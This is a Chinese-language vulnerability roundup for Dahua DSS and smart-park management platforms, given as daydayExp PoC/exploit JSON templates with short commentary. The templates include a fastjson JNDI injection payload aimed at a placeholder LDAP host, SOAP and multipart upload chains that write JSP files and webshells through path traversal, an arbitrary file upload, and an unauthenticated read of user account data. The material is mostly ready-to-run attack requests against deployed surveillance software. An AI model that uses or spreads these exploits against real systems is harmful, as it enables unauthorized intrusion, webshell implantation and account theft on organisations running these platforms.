dahua_dss_漏洞汇总

前言

大华的漏洞太多了,写个笔记汇总一下。下面各条均为 daydayExp 的 PoC 模板(JSON)格式:`pocGet`/`expGet` 是请求路径,`pocPost`/`expPost` 是请求体,`header` 是请求头,`Pattern` 是用于判定的响应正则。使用前注意:所有条目里 `hades-session-id` 这个 Cookie 的值都是同一个固定占位符,并非有效会话;`ldap://xxxxx`、`{webshell}`、`{webshell:Base64Encode:1}`、`{shellPath}` 等占位符需要自行替换;部分 `Pattern`(如 `{"status":200}`、`zip`、空的 `()`)匹配范围很宽,命中不等于漏洞一定存在,需要人工复核。以下内容仅限在获得授权的目标上测试。

大华DSS前台命令执行漏洞

说明:请求体是 fastjson 的 `com.sun.rowset.JdbcRowSetImpl` JNDI 注入载荷,`dataSourceName` 里的 `ldap://xxxxx` 需要换成自己控制的 LDAP 服务地址,`autoCommit: true` 用于触发连接。`Pattern` 只匹配响应中的 `{"status":200}`,这并不能证明 JNDI 查询已被触发,应以 LDAP 服务端是否收到回连为准。

https://github.com/bcvgh/daydayExp-pocs/blob/main/dahua/%E5%A4%A7%E5%8D%8EDSS%E5%89%8D%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.json

{
"num": 2,
"name":"大华DSS前台命令执行漏洞",
"tag":"dahua",
"type":"exec",
"poc": {
"pocGet": "/ipms/barpay/pay",
"pocPost": "{\"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\": \"ldap://xxxxx/Basic/TomcatEcho\", \"autoCommit\": true}",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "application/json",
"User-Agent": "Mozilla/5.0 (Linux;"
},
"Pattern": "({\"status\":200})"
}
}

大华DSS前台文件上传

说明:该 PoC 只是带着 multipart 的 Content-Type 向 `bitMap_addLayer.action` 发送 `id=1`,请求体中并没有真正的文件内容,实际上只是探测该接口是否可达并返回 `{"status":200}`;真正的上传请求体(文件字段名、保存路径)本页未给出。

https://github.com/bcvgh/daydayExp-pocs/blob/main/dahua/%E5%A4%A7%E5%8D%8EDSS%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.json

{
"num": 2,
"name":"大华DSS前台文件上传",
"tag":"dahua",
"type":"upload",
"poc": {
"pocGet": "/emap/bitmap/bitMap_addLayer.action?jsonstr={%22mapx%22:null,%22mapy%22:null,%22name%22:%22%22,%22path%22:%22%22,%22desc%22:%22%22,%22pId%22:null}",
"pocPost": "id=1",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "multipart/form-data; boundary=----WebKitFormBoundaryGcEYB5EKXKmZXB0R",
"User-Agent": "Mozilla/5.0 (Linux;"
},
"Pattern": "({\"status\":200})"
}
}

大华智慧园区管理平台poi文件上传

说明:通过 SOAP 接口 `uploadPicFile` 上传,`arg0` 是带 `/../../` 的目录穿越文件名,`arg1` 是 base64 编码的文件内容。注意 PoC 阶段的 `arg1` 解码后就是一段 JSP(`<%out.print("11nxx");%>`),也就是说 PoC 本身已经会在目标上写入 `test.jsp`,并非只读探测,测试后需要清理。exp 的 step2 访问 `/upload/24k.jsp`,但其 `Pattern` 为空的 `()`,任何响应都会匹配,不能据此判断 webshell 是否可用。

{
"name":"大华智慧园区管理平台poi文件上传",
"tag":"dahua",
"type":"upload",
"poc": {
"pocGet": "/emap/webservice/gis/soap/poi",
"pocPost": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:res=\"http://response.webservice.poi.mapbiz.emap.dahuatech.com/\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <res:uploadPicFile>\r\n <!--type: string-->\r\n <arg0>/../../test.jsp</arg0>\r\n <!--type: base64Binary-->\r\n <arg1>PCVvdXQucHJpbnQoIjExbnh4Iik7JT4=</arg1>\r\n </res:uploadPicFile>\r\n </soapenv:Body>\r\n</soapenv:Envelope>",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"User-Agent": "Mozilla/5.0 (Linux;",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
},
"Pattern": "(uploadPicFileResponse)"
},
"exp": {
"step1": {
"expGet": "/emap/webservice/gis/soap/poi",
"expPost": "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:res=\"http://response.webservice.poi.mapbiz.emap.dahuatech.com/\">\n <soapenv:Header/>\n <soapenv:Body>\n <res:uploadPicFile>\n <!--type: string-->\n <arg0>/../../24k.jsp</arg0>\n <!--type: base64Binary-->\n <arg1>{webshell:Base64Encode:1}</arg1>\n </res:uploadPicFile>\n </soapenv:Body>\n</soapenv:Envelope>",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"User-Agent": "Mozilla/5.0 (Linux;",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"
},
"Pattern": "(uploadPicFileResponse)"
},
"step2": {
"expGet": "/upload/24k.jsp",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "multipart/form-data; boundary=----WebKitFormBoundaryCJEleSRxsqS0lAFv",
"User-Agent": "Mozilla/5.0 (Linux;"
},
"Pattern": "()"
}
}
}

大华智慧园区管理平台文件上传

说明:PoC 阶段发送的是空的 multipart 请求,靠响应里的"上传文件为空,请重新上传"来确认接口存在,不会在目标上写文件,相对安全。exp 的 step1 以 `Filedata` 字段上传 `24k.jsp`,`Pattern` `([0-9]*\.jsp)` 用来从响应中提取服务端重命名后的文件名并填入 step2 的 `{shellPath}`,访问路径为 `/publishingImg/VIDEO/{shellPath}`。step2 的 `Pattern` 同样是空的 `()`,需要人工确认结果。

{
"name":"大华智慧园区管理平台文件上传",
"tag":"dahua",
"type":"upload",
"poc": {
"pocGet": "/publishing/publishing/material/file/video",
"pocPost": "id=1",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "multipart/form-data; boundary=----WebKitFormBoundaryCJEleSRxsqS0lAFv",
"User-Agent": "Mozilla/5.0 (Linux;"
},
"Pattern": "(上传文件为空,请重新上传)"
},
"exp": {
"step1": {
"expGet": "/publishing/publishing/material/file/video",
"expPost": "------WebKitFormBoundaryCJEleSRxsqS0lAFv\r\nContent-Disposition: form-data; name=\"Filedata\";filename=\"24k.jsp\"\r\n\r\n{webshell}\r\n------WebKitFormBoundaryCJEleSRxsqS0lAFv--",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "multipart/form-data; boundary=----WebKitFormBoundaryCJEleSRxsqS0lAFv",
"User-Agent": "Mozilla/5.0 (Linux;"
},
"Pattern": "([0-9]*\\.jsp)"
},
"step2": {
"expGet": "/publishingImg/VIDEO/{shellPath}",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "multipart/form-data; boundary=----WebKitFormBoundaryCJEleSRxsqS0lAFv",
"User-Agent": "Mozilla/5.0 (Linux;"
},
"Pattern": "()"
}
}
}

大华智慧园区综合管理平台SQL注入

说明:这条 PoC 只是 GET `/portal/services` 并匹配响应中的 `Available SOAP`,也就是对 SOAP 服务列表页的指纹识别,并没有包含任何注入载荷,也未指出注入点;不能把它命中当作 SQL 注入存在的证据。

{
"num": 2,
"name":"大华智慧园区综合管理平台SQL注入",
"tag":"dahua",
"type":"sql",
"poc": {
"pocGet": "/portal/services",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Linux;"
},
"Pattern": "(Available SOAP)"
}
}

大华智慧园区综合管理平台fastjson

说明:这条 PoC 只是用 `application/json` 向 `/eventCenter/sendCustomerMsg` 发送 `id=1` 并匹配 `{"status":200}`,本身并不是 fastjson 载荷,只能说明接口可达;真正验证需要换成类似上面 DSS 条目中的 `JdbcRowSetImpl` 载荷并配合自己的 JNDI 服务。

{
"num": 2,
"name":"大华智慧园区综合管理平台fastjson",
"tag":"dahua",
"type":"cmd",
"poc": {
"pocGet": "/eventCenter/sendCustomerMsg",
"pocPost": "id=1",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "application/json",
"User-Agent": "Mozilla/5.0 (Linux;"
},
"Pattern": "({\"status\":200})"
}
}

大华智慧园区综合管理平台任意文件上传

说明:向 `/face/personInfo/uploadBatch` 以 `file` 字段上传名为 `111.jsp`、Content-Type 为 `application/zip`、内容为 `123` 的文件。`Pattern` 只是匹配响应中的 `zip` 一词,判定很弱;条目名中的"时间戳"意指服务端会按时间戳重命名文件,但本页没有给出上传后文件的访问路径,需要自行从响应中确认。

{
"num": 2,
"name":"大华智慧园区综合管理平台任意文件上传(时间戳)",
"tag":"dahua",
"type":"upload",
"poc": {
"pocGet": "/face/personInfo/uploadBatch",
"pocPost": "--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\r\nContent-Disposition: form-data; name=\"file\"; filename=\"111.jsp\"\r\nContent-Type: application/zip\r\n\r\n123\r\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT",
"User-Agent": "Mozilla/5.0 (Linux;",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"
},
"Pattern": "(zip)"
}
}

大华智慧园区综合管理平台后台帐号密码读取

说明:未授权 GET `/admin/user_getUserInfoByUserName.action?userName=system`,`Pattern` 匹配响应中的 `loginName`,用于确认接口无需认证即可返回用户信息;响应中具体包含哪些字段(是否含密码或密码哈希)本页未展示,需要自行查看响应确认。

{
"num": 2,
"name":"大华智慧园区综合管理平台后台帐号密码读取",
"tag":"dahua",
"type":"unauthorized",
"poc": {
"pocGet": "/admin/user_getUserInfoByUserName.action?userName=system",
"header": {
"cookie": "hades-session-id=cbbce521-a761-403d-b699-9849d2cb06b9;",
"content-type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Linux;"
},
"Pattern": "(loginName)"
}
}

大华智慧园区综合管理平台initSession泄漏远程代码执行漏洞

https://github.com/0xf4n9x/DaHuaWPMSinitSessionRCE

